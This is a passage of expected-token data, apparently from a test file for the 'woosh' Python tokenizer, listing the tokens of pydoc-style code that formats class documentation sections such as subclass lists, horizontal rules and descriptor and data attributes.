woosh.Token(woosh.NAME, 'len', 1347, 27, 1347, 30),
woosh.Token(woosh.OP, '(', 1347, 30, 1347, 31),
woosh.Token(woosh.NAME, 'subclasses', 1347, 31, 1347, 41),
woosh.Token(woosh.OP, ')', 1347, 41, 1347, 42),
woosh.Token(woosh.NEWLINE, '\r\n', 1347, 42, 1348, 0),
woosh.Token(woosh.NAME, 'MAX_SUBCLASSES_TO_DISPLAY', 1348, 8, 1348, 33),
woosh.Token(woosh.OP, '=', 1348, 34, 1348, 35),
woosh.Token(woosh.NUMBER, '4', 1348, 36, 1348, 37),
woosh.Token(woosh.NEWLINE, '\r\n', 1348, 37, 1349, 0),
woosh.Token(woosh.NAME, 'if', 1349, 8, 1349, 10),
woosh.Token(woosh.NAME, 'subclasses', 1349, 11, 1349, 21),
woosh.Token(woosh.OP, ':', 1349, 21, 1349, 22),
woosh.Token(woosh.NEWLINE, '\r\n', 1349, 22, 1350, 0),
woosh.Token(woosh.INDENT, ' ', 1350, 0, 1350, 12),
woosh.Token(woosh.NAME, 'push', 1350, 12, 1350, 16),
woosh.Token(woosh.OP, '(', 1350, 16, 1350, 17),
woosh.Token(woosh.STRING, '"Built-in subclasses:"', 1350, 17, 1350, 39),
woosh.Token(woosh.OP, ')', 1350, 39, 1350, 40),
woosh.Token(woosh.NEWLINE, '\r\n', 1350, 40, 1351, 0),
woosh.Token(woosh.NAME, 'for', 1351, 12, 1351, 15),
woosh.Token(woosh.NAME, 'subclassname', 1351, 16, 1351, 28),
woosh.Token(woosh.NAME, 'in', 1351, 29, 1351, 31),
woosh.Token(woosh.NAME, 'subclasses', 1351, 32, 1351, 42),
woosh.Token(woosh.OP, '[', 1351, 42, 1351, 43),
woosh.Token(woosh.OP, ':', 1351, 43, 1351, 44),
woosh.Token(woosh.NAME, 'MAX_SUBCLASSES_TO_DISPLAY', 1351, 44, 1351, 69),
woosh.Token(woosh.OP, ']', 1351, 69, 1351, 70),
woosh.Token(woosh.OP, ':', 1351, 70, 1351, 71),
woosh.Token(woosh.NEWLINE, '\r\n', 1351, 71, 1352, 0),
woosh.Token(woosh.INDENT, ' ', 1352, 0, 1352, 16),
woosh.Token(woosh.NAME, 'push', 1352, 16, 1352, 20),
woosh.Token(woosh.OP, '(', 1352, 20, 1352, 21),
woosh.Token(woosh.STRING, "' '", 1352, 21, 1352, 27),
woosh.Token(woosh.OP, '+', 1352, 28, 1352, 29),
woosh.Token(woosh.NAME, 'subclassname', 1352, 30, 1352, 42),
woosh.Token(woosh.OP, ')', 1352, 42, 1352, 43),
woosh.Token(woosh.NEWLINE, '\r\n', 1352, 43, 1353, 0),
woosh.Token(woosh.DEDENT, ' ', 1353, 0, 1353, 12),
woosh.Token(woosh.NAME, 'if', 1353, 12, 1353, 14),
woosh.Token(woosh.NAME, 'no_of_subclasses', 1353, 15, 1353, 31),
woosh.Token(woosh.OP, '>', 1353, 32, 1353, 33),
woosh.Token(woosh.NAME, 'MAX_SUBCLASSES_TO_DISPLAY', 1353, 34, 1353, 59),
woosh.Token(woosh.OP, ':', 1353, 59, 1353, 60),
woosh.Token(woosh.NEWLINE, '\r\n', 1353, 60, 1354, 0),
woosh.Token(woosh.INDENT, ' ', 1354, 0, 1354, 16),
woosh.Token(woosh.NAME, 'push', 1354, 16, 1354, 20),
woosh.Token(woosh.OP, '(', 1354, 20, 1354, 21),
woosh.Token(woosh.STRING, "' ... and '", 1354, 21, 1354, 35),
woosh.Token(woosh.OP, '+', 1354, 36, 1354, 37),
woosh.Token(woosh.NAME, 'str', 1355, 21, 1355, 24),
woosh.Token(woosh.OP, '(', 1355, 24, 1355, 25),
woosh.Token(woosh.NAME, 'no_of_subclasses', 1355, 25, 1355, 41),
woosh.Token(woosh.OP, '-', 1355, 42, 1355, 43),
woosh.Token(woosh.NAME, 'MAX_SUBCLASSES_TO_DISPLAY', 1355, 44, 1355, 69),
woosh.Token(woosh.OP, ')', 1355, 69, 1355, 70),
woosh.Token(woosh.OP, '+', 1355, 71, 1355, 72),
woosh.Token(woosh.STRING, "' other subclasses'", 1356, 21, 1356, 40),
woosh.Token(woosh.OP, ')', 1356, 40, 1356, 41),
woosh.Token(woosh.NEWLINE, '\r\n', 1356, 41, 1357, 0),
woosh.Token(woosh.DEDENT, ' ', 1357, 0, 1357, 12),
woosh.Token(woosh.NAME, 'push', 1357, 12, 1357, 16),
woosh.Token(woosh.OP, '(', 1357, 16, 1357, 17),
woosh.Token(woosh.STRING, "''", 1357, 17, 1357, 19),
woosh.Token(woosh.OP, ')', 1357, 19, 1357, 20),
woosh.Token(woosh.NEWLINE, '\r\n', 1357, 20, 1358, 0),
woosh.Token(woosh.COMMENT, '# Cute little class to pump out a horizontal rule between sections.', 1359, 8, 1359, 75),
woosh.Token(woosh.DEDENT, ' ', 1360, 0, 1360, 8),
woosh.Token(woosh.NAME, 'class', 1360, 8, 1360, 13),
woosh.Token(woosh.NAME, 'HorizontalRule', 1360, 14, 1360, 28),
woosh.Token(woosh.OP, ':', 1360, 28, 1360, 29),
woosh.Token(woosh.NEWLINE, '\r\n', 1360, 29, 1361, 0),
woosh.Token(woosh.INDENT, ' ', 1361, 0, 1361, 12),
woosh.Token(woosh.NAME, 'def', 1361, 12, 1361, 15),
woosh.Token(woosh.NAME, '__init__', 1361, 16, 1361, 24),
woosh.Token(woosh.OP, '(', 1361, 24, 1361, 25),
woosh.Token(woosh.NAME, 'self', 1361, 25, 1361, 29),
woosh.Token(woosh.OP, ')', 1361, 29, 1361, 30),
woosh.Token(woosh.OP, ':', 1361, 30, 1361, 31),
woosh.Token(woosh.NEWLINE, '\r\n', 1361, 31, 1362, 0),
woosh.Token(woosh.INDENT, ' ', 1362, 0, 1362, 16),
woosh.Token(woosh.NAME, 'self', 1362, 16, 1362, 20),
woosh.Token(woosh.OP, '.', 1362, 20, 1362, 21),
woosh.Token(woosh.NAME, 'needone', 1362, 21, 1362, 28),
woosh.Token(woosh.OP, '=', 1362, 29, 1362, 30),
woosh.Token(woosh.NUMBER, '0', 1362, 31, 1362, 32),
woosh.Token(woosh.NEWLINE, '\r\n', 1362, 32, 1363, 0),
woosh.Token(woosh.DEDENT, ' ', 1363, 0, 1363, 12),
woosh.Token(woosh.NAME, 'def', 1363, 12, 1363, 15),
woosh.Token(woosh.NAME, 'maybe', 1363, 16, 1363, 21),
woosh.Token(woosh.OP, '(', 1363, 21, 1363, 22),
woosh.Token(woosh.NAME, 'self', 1363, 22, 1363, 26),
woosh.Token(woosh.OP, ')', 1363, 26, 1363, 27),
woosh.Token(woosh.OP, ':', 1363, 27, 1363, 28),
woosh.Token(woosh.NEWLINE, '\r\n', 1363, 28, 1364, 0),
woosh.Token(woosh.INDENT, ' ', 1364, 0, 1364, 16),
woosh.Token(woosh.NAME, 'if', 1364, 16, 1364, 18),
woosh.Token(woosh.NAME, 'self', 1364, 19, 1364, 23),
woosh.Token(woosh.OP, '.', 1364, 23, 1364, 24),
woosh.Token(woosh.NAME, 'needone', 1364, 24, 1364, 31),
woosh.Token(woosh.OP, ':', 1364, 31, 1364, 32),
woosh.Token(woosh.NEWLINE, '\r\n', 1364, 32, 1365, 0),
woosh.Token(woosh.INDENT, ' ', 1365, 0, 1365, 20),
woosh.Token(woosh.NAME, 'push', 1365, 20, 1365, 24),
woosh.Token(woosh.OP, '(', 1365, 24, 1365, 25),
woosh.Token(woosh.STRING, "'-'", 1365, 25, 1365, 28),
woosh.Token(woosh.OP, '*', 1365, 29, 1365, 30),
woosh.Token(woosh.NUMBER, '70', 1365, 31, 1365, 33),
woosh.Token(woosh.OP, ')', 1365, 33, 1365, 34),
woosh.Token(woosh.NEWLINE, '\r\n', 1365, 34, 1366, 0),
woosh.Token(woosh.DEDENT, ' ', 1366, 0, 1366, 16),
woosh.Token(woosh.NAME, 'self', 1366, 16, 1366, 20),
woosh.Token(woosh.OP, '.', 1366, 20, 1366, 21),
woosh.Token(woosh.NAME, 'needone', 1366, 21, 1366, 28),
woosh.Token(woosh.OP, '=', 1366, 29, 1366, 30),
woosh.Token(woosh.NUMBER, '1', 1366, 31, 1366, 32),
woosh.Token(woosh.NEWLINE, '\r\n', 1366, 32, 1367, 0),
woosh.Token(woosh.DEDENT, ' ', 1367, 0, 1367, 8),
woosh.Token(woosh.DEDENT, '', 1367, 8, 1367, 8),
woosh.Token(woosh.NAME, 'hr', 1367, 8, 1367, 10),
woosh.Token(woosh.OP, '=', 1367, 11, 1367, 12),
woosh.Token(woosh.NAME, 'HorizontalRule', 1367, 13, 1367, 27),
woosh.Token(woosh.OP, '(', 1367, 27, 1367, 28),
woosh.Token(woosh.OP, ')', 1367, 28, 1367, 29),
woosh.Token(woosh.NEWLINE, '\r\n', 1367, 29, 1368, 0),
woosh.Token(woosh.NAME, 'def', 1369, 8, 1369, 11),
woosh.Token(woosh.NAME, 'spill', 1369, 12, 1369, 17),
woosh.Token(woosh.OP, '(', 1369, 17, 1369, 18),
woosh.Token(woosh.NAME, 'msg', 1369, 18, 1369, 21),
woosh.Token(woosh.OP, ',', 1369, 21, 1369, 22),
woosh.Token(woosh.NAME, 'attrs', 1369, 23, 1369, 28),
woosh.Token(woosh.OP, ',', 1369, 28, 1369, 29),
woosh.Token(woosh.NAME, 'predicate', 1369, 30, 1369, 39),
woosh.Token(woosh.OP, ')', 1369, 39, 1369, 40),
woosh.Token(woosh.OP, ':', 1369, 40, 1369, 41),
woosh.Token(woosh.NEWLINE, '\r\n', 1369, 41, 1370, 0),
woosh.Token(woosh.INDENT, ' ', 1370, 0, 1370, 12),
woosh.Token(woosh.NAME, 'ok', 1370, 12, 1370, 14),
woosh.Token(woosh.OP, ',', 1370, 14, 1370, 15),
woosh.Token(woosh.NAME, 'attrs', 1370, 16, 1370, 21),
woosh.Token(woosh.OP, '=', 1370, 22, 1370, 23),
woosh.Token(woosh.NAME, '_split_list', 1370, 24, 1370, 35),
woosh.Token(woosh.OP, '(', 1370, 35, 1370, 36),
woosh.Token(woosh.NAME, 'attrs', 1370, 36, 1370, 41),
woosh.Token(woosh.OP, ',', 1370, 41, 1370, 42),
woosh.Token(woosh.NAME, 'predicate', 1370, 43, 1370, 52),
woosh.Token(woosh.OP, ')', 1370, 52, 1370, 53),
woosh.Token(woosh.NEWLINE, '\r\n', 1370, 53, 1371, 0),
woosh.Token(woosh.NAME, 'if', 1371, 12, 1371, 14),
woosh.Token(woosh.NAME, 'ok', 1371, 15, 1371, 17),
woosh.Token(woosh.OP, ':', 1371, 17, 1371, 18),
woosh.Token(woosh.NEWLINE, '\r\n', 1371, 18, 1372, 0),
woosh.Token(woosh.INDENT, ' ', 1372, 0, 1372, 16),
woosh.Token(woosh.NAME, 'hr', 1372, 16, 1372, 18),
woosh.Token(woosh.OP, '.', 1372, 18, 1372, 19),
woosh.Token(woosh.NAME, 'maybe', 1372, 19, 1372, 24),
woosh.Token(woosh.OP, '(', 1372, 24, 1372, 25),
woosh.Token(woosh.OP, ')', 1372, 25, 1372, 26),
woosh.Token(woosh.NEWLINE, '\r\n', 1372, 26, 1373, 0),
woosh.Token(woosh.NAME, 'push', 1373, 16, 1373, 20),
woosh.Token(woosh.OP, '(', 1373, 20, 1373, 21),
woosh.Token(woosh.NAME, 'msg', 1373, 21, 1373, 24),
woosh.Token(woosh.OP, ')', 1373, 24, 1373, 25),
woosh.Token(woosh.NEWLINE, '\r\n', 1373, 25, 1374, 0),
woosh.Token(woosh.NAME, 'for', 1374, 16, 1374, 19),
woosh.Token(woosh.NAME, 'name', 1374, 20, 1374, 24),
woosh.Token(woosh.OP, ',', 1374, 24, 1374, 25),
woosh.Token(woosh.NAME, 'kind', 1374, 26, 1374, 30),
woosh.Token(woosh.OP, ',', 1374, 30, 1374, 31),
woosh.Token(woosh.NAME, 'homecls', 1374, 32, 1374, 39),
woosh.Token(woosh.OP, ',', 1374, 39, 1374, 40),
woosh.Token(woosh.NAME, 'value', 1374, 41, 1374, 46),
woosh.Token(woosh.NAME, 'in', 1374, 47, 1374, 49),
woosh.Token(woosh.NAME, 'ok', 1374, 50, 1374, 52),
woosh.Token(woosh.OP, ':', 1374, 52, 1374, 53),
woosh.Token(woosh.NEWLINE, '\r\n', 1374, 53, 1375, 0),
woosh.Token(woosh.INDENT, ' ', 1375, 0, 1375, 20),
woosh.Token(woosh.NAME, 'try', 1375, 20, 1375, 23),
woosh.Token(woosh.OP, ':', 1375, 23, 1375, 24),
woosh.Token(woosh.NEWLINE, '\r\n', 1375, 24, 1376, 0),
woosh.Token(woosh.INDENT, ' ', 1376, 0, 1376, 24),
woosh.Token(woosh.NAME, 'value', 1376, 24, 1376, 29),
woosh.Token(woosh.OP, '=', 1376, 30, 1376, 31),
woosh.Token(woosh.NAME, 'getattr', 1376, 32, 1376, 39),
woosh.Token(woosh.OP, '(', 1376, 39, 1376, 40),
woosh.Token(woosh.NAME, 'object', 1376, 40, 1376, 46),
woosh.Token(woosh.OP, ',', 1376, 46, 1376, 47),
woosh.Token(woosh.NAME, 'name', 1376, 48, 1376, 52),
woosh.Token(woosh.OP, ')', 1376, 52, 1376, 53),
woosh.Token(woosh.NEWLINE, '\r\n', 1376, 53, 1377, 0),
woosh.Token(woosh.DEDENT, ' ', 1377, 0, 1377, 20),
woosh.Token(woosh.NAME, 'except', 1377, 20, 1377, 26),
woosh.Token(woosh.NAME, 'Exception', 1377, 27, 1377, 36),
woosh.Token(woosh.OP, ':', 1377, 36, 1377, 37),
woosh.Token(woosh.NEWLINE, '\r\n', 1377, 37, 1378, 0),
woosh.Token(woosh.COMMENT, '# Some descriptors may meet a failure in their __get__.', 1378, 24, 1378, 79),
woosh.Token(woosh.COMMENT, '# (bug #1785)', 1379, 24, 1379, 37),
woosh.Token(woosh.INDENT, ' ', 1380, 0, 1380, 24),
woosh.Token(woosh.NAME, 'push', 1380, 24, 1380, 28),
woosh.Token(woosh.OP, '(', 1380, 28, 1380, 29),
woosh.Token(woosh.NAME, 'self', 1380, 29, 1380, 33),
woosh.Token(woosh.OP, '.', 1380, 33, 1380, 34),
woosh.Token(woosh.NAME, 'docdata', 1380, 34, 1380, 41),
woosh.Token(woosh.OP, '(', 1380, 41, 1380, 42),
woosh.Token(woosh.NAME, 'value', 1380, 42, 1380, 47),
woosh.Token(woosh.OP, ',', 1380, 47, 1380, 48),
woosh.Token(woosh.NAME, 'name', 1380, 49, 1380, 53),
woosh.Token(woosh.OP, ',', 1380, 53, 1380, 54),
woosh.Token(woosh.NAME, 'mod', 1380, 55, 1380, 58),
woosh.Token(woosh.OP, ')', 1380, 58, 1380, 59),
woosh.Token(woosh.OP, ')', 1380, 59, 1380, 60),
woosh.Token(woosh.NEWLINE, '\r\n', 1380, 60, 1381, 0),
woosh.Token(woosh.DEDENT, ' ', 1381, 0, 1381, 20),
woosh.Token(woosh.NAME, 'else', 1381, 20, 1381, 24),
woosh.Token(woosh.OP, ':', 1381, 24, 1381, 25),
woosh.Token(woosh.NEWLINE, '\r\n', 1381, 25, 1382, 0),
woosh.Token(woosh.INDENT, ' ', 1382, 0, 1382, 24),
woosh.Token(woosh.NAME, 'push', 1382, 24, 1382, 28),
woosh.Token(woosh.OP, '(', 1382, 28, 1382, 29),
woosh.Token(woosh.NAME, 'self', 1382, 29, 1382, 33),
woosh.Token(woosh.OP, '.', 1382, 33, 1382, 34),
woosh.Token(woosh.NAME, 'document', 1382, 34, 1382, 42),
woosh.Token(woosh.OP, '(', 1382, 42, 1382, 43),
woosh.Token(woosh.NAME, 'value', 1382, 43, 1382, 48),
woosh.Token(woosh.OP, ',', 1382, 48, 1382, 49),
woosh.Token(woosh.NAME, 'name', 1383, 40, 1383, 44),
woosh.Token(woosh.OP, ',', 1383, 44, 1383, 45),
woosh.Token(woosh.NAME, 'mod', 1383, 46, 1383, 49),
woosh.Token(woosh.OP, ',', 1383, 49, 1383, 50),
woosh.Token(woosh.NAME, 'object', 1383, 51, 1383, 57),
woosh.Token(woosh.OP, ')', 1383, 57, 1383, 58),
woosh.Token(woosh.OP, ')', 1383, 58, 1383, 59),
woosh.Token(woosh.NEWLINE, '\r\n', 1383, 59, 1384, 0),
woosh.Token(woosh.DEDENT, ' ', 1384, 0, 1384, 12),
woosh.Token(woosh.DEDENT, '', 1384, 12, 1384, 12),
woosh.Token(woosh.DEDENT, '', 1384, 12, 1384, 12),
woosh.Token(woosh.NAME, 'return', 1384, 12, 1384, 18),
woosh.Token(woosh.NAME, 'attrs', 1384, 19, 1384, 24),
woosh.Token(woosh.NEWLINE, '\r\n', 1384, 24, 1385, 0),
woosh.Token(woosh.DEDENT, ' ', 1386, 0, 1386, 8),
woosh.Token(woosh.NAME, 'def', 1386, 8, 1386, 11),
woosh.Token(woosh.NAME, 'spilldescriptors', 1386, 12, 1386, 28),
woosh.Token(woosh.OP, '(', 1386, 28, 1386, 29),
woosh.Token(woosh.NAME, 'msg', 1386, 29, 1386, 32),
woosh.Token(woosh.OP, ',', 1386, 32, 1386, 33),
woosh.Token(woosh.NAME, 'attrs', 1386, 34, 1386, 39),
woosh.Token(woosh.OP, ',', 1386, 39, 1386, 40),
woosh.Token(woosh.NAME, 'predicate', 1386, 41, 1386, 50),
woosh.Token(woosh.OP, ')', 1386, 50, 1386, 51),
woosh.Token(woosh.OP, ':', 1386, 51, 1386, 52),
woosh.Token(woosh.NEWLINE, '\r\n', 1386, 52, 1387, 0),
woosh.Token(woosh.INDENT, ' ', 1387, 0, 1387, 12),
woosh.Token(woosh.NAME, 'ok', 1387, 12, 1387, 14),
woosh.Token(woosh.OP, ',', 1387, 14, 1387, 15),
woosh.Token(woosh.NAME, 'attrs', 1387, 16, 1387, 21),
woosh.Token(woosh.OP, '=', 1387, 22, 1387, 23),
woosh.Token(woosh.NAME, '_split_list', 1387, 24, 1387, 35),
woosh.Token(woosh.OP, '(', 1387, 35, 1387, 36),
woosh.Token(woosh.NAME, 'attrs', 1387, 36, 1387, 41),
woosh.Token(woosh.OP, ',', 1387, 41, 1387, 42),
woosh.Token(woosh.NAME, 'predicate', 1387, 43, 1387, 52),
woosh.Token(woosh.OP, ')', 1387, 52, 1387, 53),
woosh.Token(woosh.NEWLINE, '\r\n', 1387, 53, 1388, 0),
woosh.Token(woosh.NAME, 'if', 1388, 12, 1388, 14),
woosh.Token(woosh.NAME, 'ok', 1388, 15, 1388, 17),
woosh.Token(woosh.OP, ':', 1388, 17, 1388, 18),
woosh.Token(woosh.NEWLINE, '\r\n', 1388, 18, 1389, 0),
woosh.Token(woosh.INDENT, ' ', 1389, 0, 1389, 16),
woosh.Token(woosh.NAME, 'hr', 1389, 16, 1389, 18),
woosh.Token(woosh.OP, '.', 1389, 18, 1389, 19),
woosh.Token(woosh.NAME, 'maybe', 1389, 19, 1389, 24),
woosh.Token(woosh.OP, '(', 1389, 24, 1389, 25),
woosh.Token(woosh.OP, ')', 1389, 25, 1389, 26),
woosh.Token(woosh.NEWLINE, '\r\n', 1389, 26, 1390, 0),
woosh.Token(woosh.NAME, 'push', 1390, 16, 1390, 20),
woosh.Token(woosh.OP, '(', 1390, 20, 1390, 21),
woosh.Token(woosh.NAME, 'msg', 1390, 21, 1390, 24),
woosh.Token(woosh.OP, ')', 1390, 24, 1390, 25),
woosh.Token(woosh.NEWLINE, '\r\n', 1390, 25, 1391, 0),
woosh.Token(woosh.NAME, 'for', 1391, 16, 1391, 19),
woosh.Token(woosh.NAME, 'name', 1391, 20, 1391, 24),
woosh.Token(woosh.OP, ',', 1391, 24, 1391, 25),
woosh.Token(woosh.NAME, 'kind', 1391, 26, 1391, 30),
woosh.Token(woosh.OP, ',', 1391, 30, 1391, 31),
woosh.Token(woosh.NAME, 'homecls', 1391, 32, 1391, 39),
woosh.Token(woosh.OP, ',', 1391, 39, 1391, 40),
woosh.Token(woosh.NAME, 'value', 1391, 41, 1391, 46),
woosh.Token(woosh.NAME, 'in', 1391, 47, 1391, 49),
woosh.Token(woosh.NAME, 'ok', 1391, 50, 1391, 52),
woosh.Token(woosh.OP, ':', 1391, 52, 1391, 53),
woosh.Token(woosh.NEWLINE, '\r\n', 1391, 53, 1392, 0),
woosh.Token(woosh.INDENT, ' ', 1392, 0, 1392, 20),
woosh.Token(woosh.NAME, 'push', 1392, 20, 1392, 24),
woosh.Token(woosh.OP, '(', 1392, 24, 1392, 25),
woosh.Token(woosh.NAME, 'self', 1392, 25, 1392, 29),
woosh.Token(woosh.OP, '.', 1392, 29, 1392, 30),
woosh.Token(woosh.NAME, 'docdata', 1392, 30, 1392, 37),
woosh.Token(woosh.OP, '(', 1392, 37, 1392, 38),
woosh.Token(woosh.NAME, 'value', 1392, 38, 1392, 43),
woosh.Token(woosh.OP, ',', 1392, 43, 1392, 44),
woosh.Token(woosh.NAME, 'name', 1392, 45, 1392, 49),
woosh.Token(woosh.OP, ',', 1392, 49, 1392, 50),
woosh.Token(woosh.NAME, 'mod', 1392, 51, 1392, 54),
woosh.Token(woosh.OP, ')', 1392, 54, 1392, 55),
woosh.Token(woosh.OP, ')', 1392, 55, 1392, 56),
woosh.Token(woosh.NEWLINE, '\r\n', 1392, 56, 1393, 0),
woosh.Token(woosh.DEDENT, ' ', 1393, 0, 1393, 12),
woosh.Token(woosh.DEDENT, '', 1393, 12, 1393, 12),
woosh.Token(woosh.NAME, 'return', 1393, 12, 1393, 18),
woosh.Token(woosh.NAME, 'attrs', 1393, 19, 1393, 24),
woosh.Token(woosh.NEWLINE, '\r\n', 1393, 24, 1394, 0),
woosh.Token(woosh.DEDENT, ' ', 1395, 0, 1395, 8),
woosh.Token(woosh.NAME, 'def', 1395, 8, 1395, 11),
woosh.Token(woosh.NAME, 'spilldata', 1395, 12, 1395, 21),
woosh.Token(woosh.OP, '(', 1395, 21, 1395, 22),
woosh.Token(woosh.NAME, 'msg', 1395, 22, 1395, 25),
woosh.Token(woosh.OP, ',', 1395, 25, 1395, 26),
woosh.Token(woosh.NAME, 'attrs', 1395, 27, 1395, 32),
woosh.Token(woosh.OP, ',', 1395, 32, 1395, 33),
woosh.Token(woosh.NAME, 'predicate', 1395, 34, 1395, 43),
woosh.Token(woosh.OP, ')', 1395, 43, 1395, 44),
woosh.Token(woosh.OP, ':', 1395, 44, 1395, 45),
woosh.Token(woosh.NEWLINE, '\r\n', 1395, 45, 1396, 0),
woosh.Token(woosh.INDENT, ' ', 1396, 0, 1396, 12),
woosh.Token(woosh.NAME, 'ok', 1396, 12, 1396, 14),
woosh.Token(woosh.OP, ',', 1396, 14, 1396, 15),
woosh.Token(woosh.NAME, 'attrs', 1396, 16, 1396, 21),
woosh.Token(woosh.OP, '=', 1396, 22, 1396, 23),
woosh.Token(woosh.NAME, '_split_list', 1396, 24, 1396, 35),
woosh.Token(woosh.OP, '(', 1396, 35, 1396, 36),
woosh.Token(woosh.NAME, 'attrs', 1396, 36, 1396, 41),
woosh.Token(woosh.OP, ',', 1396, 41, 1396, 42),
woosh.Token(woosh.NAME, 'predicate', 1396, 43, 1396, 52),
woosh.Token(woosh.OP, ')', 1396, 52, 1396, 53),
woosh.Token(woosh.NEWLINE, '\r\n', 1396, 53, 1397, 0),
woosh.Token(woosh.NAME, 'if', 1397, 12, 1397, 14),
woosh.Token(woosh.NAME, 'ok', 1397, 15, 1397, 17),
woosh.Token(woosh.OP, ':', 1397, 17, 1397, 18),
woosh.Token(woosh.NEWLINE, '\r\n', 1397, 18, 1398, 0),
woosh.Token(woosh.INDENT, ' ', 1398, 0, 1398, 16),
woosh.Token(woosh.NAME, 'hr', 1398, 16, 1398, 18),
woosh.Token(woosh.OP, '.', 1398, 18, 1398, 19),
woosh.Token(woosh.NAME, 'maybe', 1398, 19, 1398, 24),
woosh.Token(woosh.OP, '(', 1398, 24, 1398, 25),
woosh.Token(woosh.OP, ')', 1398, 25, 1398, 26),
woosh.Token(woosh.NEWLINE, '\r\n', 1398, 26, 1399, 0),
woosh.Token(woosh.NAME, 'push', 1399, 16, 1399, 20),
woosh.Token(woosh.OP, '(', 1399, 20, 1399, 21),
woosh.Token(woosh.NAME, 'msg', 1399, 21, 1399, 24),
woosh.Token(woosh.OP, ')', 1399, 24, 1399, 25),
woosh.Token(woosh.NEWLINE, '\r\n', 1399, 25, 1400, 0),
woosh.Token(woosh.NAME, 'for', 1400, 16, 1400, 19),
woosh.Token(woosh.NAME, 'name', 1400, 20, 1400, 24),
woosh.Token(woosh.OP, ',', 1400, 24, 1400, 25),
woosh.Token(woosh.NAME, 'kind', 1400, 26, 1400, 30),
woosh.Token(woosh.OP, ',', 1400, 30, 1400, 31),
woosh.Token(woosh.NAME, 'homecls', 1400, 32, 1400, 39),
woosh.Token(woosh.OP, ',', 1400, 39, 1400, 40),
woosh.Token(woosh.NAME, 'value', 1400, 41, 1400, 46),
woosh.Token(woosh.NAME, 'in', 1400, 47, 1400, 49),
woosh.Token(woosh.NAME, 'ok', 1400, 50, 1400, 52),
woosh.Token(woosh.OP, ':', 1400, 52, 1400, 53),
woosh.Token(woosh.NEWLINE, '\r\n', 1400, 53, 1401, 0),
woosh.Token(woosh.INDENT, ' ', 1401, 0, 1401, 20),
woosh.Token(woosh.NAME, 'doc', 1401, 20, 1401, 23),
woosh.Token(woosh.OP, '=', 1401, 24, 1401, 25),
woosh.Token(woosh.NAME, 'getdoc', 1401, 26, 1401, 32),
woosh.Token(woosh.OP, '(', 1401, 32, 1401, 33),
woosh.Token(woosh.NAME, 'value', 1401, 33, 1401, 38),
woosh.Token(woosh.OP, ')', 1401, 38, 1401, 39),
woosh.Token(woosh.NEWLINE, '\r\n', 1401, 39, 1402, 0),
woosh.Token(woosh.NAME, 'try', 1402, 20, 1402, 23),
woosh.Token(woosh.OP, ':', 1402, 23, 1402, 24),
woosh.Token(woosh.NEWLINE, '\r\n', 1402, 24, 1403, 0),
woosh.Token(woosh.INDENT, ' ', 1403, 0, 1403, 24),
woosh.Token(woosh.NAME, 'obj', 1403, 24, 1403, 27),
woosh.Token(woosh.OP, '=', 1403, 28, 1403, 29),
woosh.Token(woosh.NAME, 'getattr', 1403, 30, 1403, 37),
woosh.Token(woosh.OP, '(', 1403, 37, 1403, 38),
woosh.Token(woosh.NAME, 'object', 1403, 38, 1403, 44),
woosh.Token(woosh.OP, ',', 1403, 44, 1403, 45),
woosh.Token(woosh.NAME, 'name', 1403, 46, 1403, 50),
woosh.Token(woosh.OP, ')', 1403, 50, 1403, 51),
woosh.Token(woosh.NEWLINE, '\r\n', 1403, 51, 1404, 0),
woosh.Token(woosh.DEDENT, ' ', 1404, 0, 1404, 20),
woosh.Token(woosh.NAME, 'except', 1404, 20, 1404, 26),
woosh.Token(woosh.NAME, 'AttributeError', 1404, 27, 1404, 41),
woosh.Token(woosh.OP, ':', 1404, 41, 1404, 42),
woosh.Token(woosh.NEWLINE, '\r\n', 1404, 42, 1405, 0),
woosh.Token(woosh.INDENT, ' ', 1405, 0, 1405, 24),
woosh.Token(woosh.NAME, 'obj', 1405, 24, 1405, 27),
woosh.Token(woosh.OP, '=', 1405, 28, 1405, 29),
woosh.Token(woosh.NAME, 'homecls', 1405, 30, 1405, 37),
woosh.Token(woosh.OP, '.', 1405, 37, 1405, 38),
woosh.Token(woosh.NAME, '__dict__', 1405, 38, 1405, 46),
woosh.Token(woosh.OP, '[', 1405, 46, 1405, 47),
woosh.Token(woosh.NAME, 'name', 1405, 47, 1405, 51),
woosh.Token(woosh.OP, ']', 1405, 51, 1405, 52),
woosh.Token(woosh.NEWLINE, '\r\n', 1405, 52, 1406, 0),
woosh.Token(woosh.DEDENT, ' ', 1406, 0, 1406, 20),
woosh.Token(woosh.NAME, 'push', 1406, 20, 1406, 24),
woosh.Token(woosh.OP, '(', 1406, 24, 1406, 25),
woosh.Token(woosh.NAME, 'self', 1406, 25, 1406, 29),
woosh.Token(woosh.OP, '.', 1406, 29, 1406, 30),
woosh.Token(woosh.NAME, 'docother', 1406, 30, 1406, 38),
woosh.Token(woosh.OP, '(', 1406, 38, 1406, 39),
woosh.Token(woosh.NAME, 'obj', 1406, 39, 1406, 42),
woosh.Token(woosh.OP, ',', 1406, 42, 1406, 43),
woosh.Token(woosh.NAME, 'name', 1406, 44, 1406, 48),
woosh.Token(woosh.OP, ',', 1406, 48, 1406, 49),
woosh.Token(woosh.NAME, 'mod', 1406, 50, 1406, 53),
woosh.Token(woosh.OP, ',', 1406, 53, 1406, 54),
woosh.Token(woosh.NAME, 'maxlen', 1406, 55, 1406, 61),
woosh.Token(woosh.OP, '=', 1406, 61, 1406, 62),
woosh.Token(woosh.NUMBER, '70', 1406, 62, 1406, 64),
woosh.Token(woosh.OP, ',', 1406, 64, 1406, 65),
woosh.Token(woosh.NAME, 'doc', 1406, 66, 1406, 69),
woosh.Token(woosh.OP, '=', 1406, 69, 1406, 70),
woosh.Token(woosh.NAME, 'doc', 1406, 70, 1406, 73),
woosh.Token(woosh.OP, ')', 1406, 73, 1406, 74),
woosh.Token(woosh.OP, '+', 1406, 75, 1406, 76),
woosh.Token(woosh.STRING, "'\\n'", 1407, 25, 1407, 29),
woosh.Token(woosh.OP, ')', 1407, 29, 1407, 30),
woosh.Token(woosh.NEWLINE, '\r\n', 1407, 30, 1408, 0),
woosh.Token(woosh.DEDENT, ' ', 1408, 0, 1408, 12),
woosh.Token(woosh.DEDENT, '', 1408, 12, 1408, 12),
woosh.Token(woosh.NAME, 'return', 1408, 12, 1408, 18),
woosh.Token(woosh.NAME, 'attrs', 1408, 19, 1408, 24),
woosh.Token(woosh.NEWLINE, '\r\n', 1408, 24, 1409, 0),
woosh.Token(woosh.DEDENT, ' ', 1410, 0, 1410, 8),
woosh.Token(woosh.NAME, 'attrs', 1410, 8, 1410, 13),
woosh.Token(woosh.OP, '=', 1410, 14, 1410, 15),
